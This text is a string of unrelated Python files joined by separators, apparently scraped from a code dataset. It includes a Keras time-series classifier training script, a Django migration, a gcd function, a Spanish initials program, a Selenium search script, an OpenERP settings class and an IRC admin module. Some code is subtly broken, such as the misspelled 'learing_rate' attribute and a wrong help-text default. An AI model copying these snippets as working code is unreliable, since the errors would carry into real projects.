parser.add_argument('--batch_size', type=int, default=128, help='network update batch size')
parser.add_argument('--epochs', type=int, default=100, help='Epochs')
parser.add_argument('--loss', type=str, default='categorical_crossentropy',
help='loss function to use. Default=mean_absolute_error')
args = parser.parse_args()
def train(model, X_train, y_train, callbacks, X_valid=None, y_valid=None):
start_time = time.time()
if X_valid.any() != None:
val_data = (X_valid, y_valid)
model.fit(X_train, y_train, epochs=args.epochs, batch_size=args.batch_size, validation_data=val_data, callbacks=callbacks)
else:
model.fit(X_train, y_train, epochs=args.epochs, batch_size=args.batch_size, validation_split=0.2, callbacks=callbacks)
elapsed = round(time.time() - start_time)
elapsed = str(datetime.timedelta(seconds=elapsed))
print("Training. Total elapsed time (h:m:s): {}".format(elapsed))
def main(net_init, data_path, data_classes, data_name, MODEL, model_name, file_res):
X_train, y_train, X_test, y_test, nb_classes = ReadData(data_path)
assert data_classes == nb_classes
y_train = keras.utils.to_categorical(y_train, nb_classes)
y_test = keras.utils.to_categorical(y_test, nb_classes)
args.batch_size = min(int(X_train.shape[0]/10), 16)
model = MODEL(net_init, input_shape=X_train.shape[1:])
if args.optim == 'SGD':
optimizer = keras.optimizers.SGD(learning_rate=args.learing_rate, momentum=0.0, decay=0.0, nesterov=False)
elif args.optim == 'RMSprop':
optimizer = keras.optimizers.RMSprop(learning_rate=args.learing_rate, rho=0.9, epsilon=1e-8, decay=0.0)
else: # Adam
optimizer = keras.optimizers.Adam(learning_rate=args.learning_rate, beta_1=0.9, beta_2=0.999)
model.compile(loss=args.loss, optimizer=optimizer, metrics=['accuracy'])
callbacks = [
keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=40, min_lr=0.0001),
keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=1e-5, patience=60)
]
# Training Model
train(model, X_train, y_train, callbacks, X_valid=X_test, y_valid=y_test)
# Testing Evaluation
pred_test = model.predict(X_test)
test_auc = Auc_Score(y_test, pred_test)
pred_test = np.argmax(pred_test, axis=1)
y_test = np.argmax(y_test, axis=1)
test_acc = Accuracy_Score(y_test, pred_test)
test_precision = Precision_Score(y_test, pred_test)
test_recall = Recall_Score(y_test, pred_test)
test_f1 = F1_Score(y_test, pred_test)
print('The current dataset:', data_name, ' | The current model:', model_name)
print('[Test] Accuracy - {:.4f} Precision - {:.4f} Recall - {:.4f} AUC - {:.4f} F1 - {:.4f}'
.format(test_acc, test_precision, test_recall, test_auc, test_f1))
file_res.write('{}, {}, {}, {}, {}, {}, {}\n'.format(datetime.datetime.now(), net_init.RNNUnits, test_acc, test_precision, test_recall, test_auc, test_f1))
del X_train, y_train, X_test, y_test, model, optimizer
gc.collect()
if __name__ == '__main__':
net_init = NetInit()
for data_name, data_classes in zip(Data_Config.keys(), Data_Config.values()):
data_path = '/mnt/nfsroot/zhangxj/ts_multivariate_classification//TSDatasets/' + data_name + '.mat'
for model_name, model in zip(Model.keys(), Model.values()):
print('The current dataset:', data_name, ' | The current model:', model_name)
file_res = open(f'/home/zhangxj/program/results/mtsc/{data_name}_{model_name}_results.csv', 'a+')
file_res.write('moment, rnn_units, Accuracy, Precision, Recall, AUC, F1\n')
for n in [16, 32, 64]:
net_init.RNNUnits = n
net_init.FeatDims = data_classes
main(net_init, data_path, data_classes, data_name, model, model_name, file_res)
file_res.close()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-11-21 17:17
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('apps', '0002_usuarios'),
]
operations = [
migrations.DeleteModel(
name='Usuarios',
),
]
|
def gcd(a, b):
"""Return the greatest common divisor of a and b using a recursive
implementation of Euclid's algorithm."""
try: #keep calling gcd on smaller and smaller values of b
return gcd(b, a % b)
except ZeroDivisionError: #untill we get to the point that b is zero
#this line will get an exception and we return a
return a
|
#Programa: nombre.py
#Propósito: Pedir el nombre y los dos apellidos de una persona y mostrar las iniciales.
#Autor: Jose Manuel Serrano Palomo.
#Fecha: 13/10/2019
#
#Variables a usar:
# nombre, apellido1, apellido2 estas seran las variables del nombre
# iniciales es la variable que contrendra las iniciales del nombre completo
#
#Algoritmo:
# LEER nombre, apellido1, apellido2
# iniciales <--- nombre[0] + apellido1[0] + apellido2[0]
# ESCRIBIR iniciales
print("Obtencion de iniciales de un nombre completo")
print("----------------------------------------------\n")
# Lectura de datos
nombre = str(input("Introduce tu nombre: "))
apellido1 = str(input("Introduce tu primer apellido: "))
apellido2 = str(input("Introduce tu segundo apellido: "))
# Calculos
iniciales = (nombre[0] + apellido1[0] + apellido2[0]).upper()
#Escritura de datos
print("Tus iniciales son: ", iniciales)
|
if __name__ == "__main__":
favorite_languages = {
'jen': 'python',
'sarah': 'c',
'edward': 'ruby',
'phil': 'python'
}
persons = {
'jen',
'sarah',
'bjorn',
'benthe'
}
for person in persons:
if person in favorite_languages.keys():
print(person + ", Thanks for filling this enquete out!")
else:
print(person + ", You should really do this enquete!") |
from selenium import webdriver
import os
browser = webdriver.Chrome()
url = "http://www.baidu.com"
browser.get(url)
input= browser.find_element_by_id("kw")
input.send_keys("python")
browser.find_element_by_id("su").click()
#关闭浏览器
#browser.quit()
|
# -*- coding: utf-8 -*-
import logging
from openerp import pooler
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
from openerp.osv import osv, fields
from openerp import netsvc
class sale_configuration(osv.osv):
_inherit = 'sale.config.settings'
def _select_value(self,cr,uid,ids, context=None):
cr.execute("""select limit_amount_double from sale_config_settings order by id desc""")
valor = cr.fetchone()
if valor and valor[0] != None and valor[0] > 0 :
return valor[0]
else:
return 500000
_columns = {
'limit_amount_double': fields.integer('limite para requerir una segunda aprobación',required=True,
help="Amount after which validation of sales is required."),
}
_defaults = {
'limit_amount_double': _select_value
}
|
from util.esc import unescape
class RawModule:
require = "cmd"
def __init__(self, circa):
self.circa = circa
self.events = {
"cmd.raw": [self.raw]
}
self.docs = {
"raw": "raw [msg] → send a raw IRC message. Admins only."
}
def raw(self, fr, to, msg, m):
if self.circa.is_admin(m.prefix):
self.circa.send(unescape(msg))
module = RawModule
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.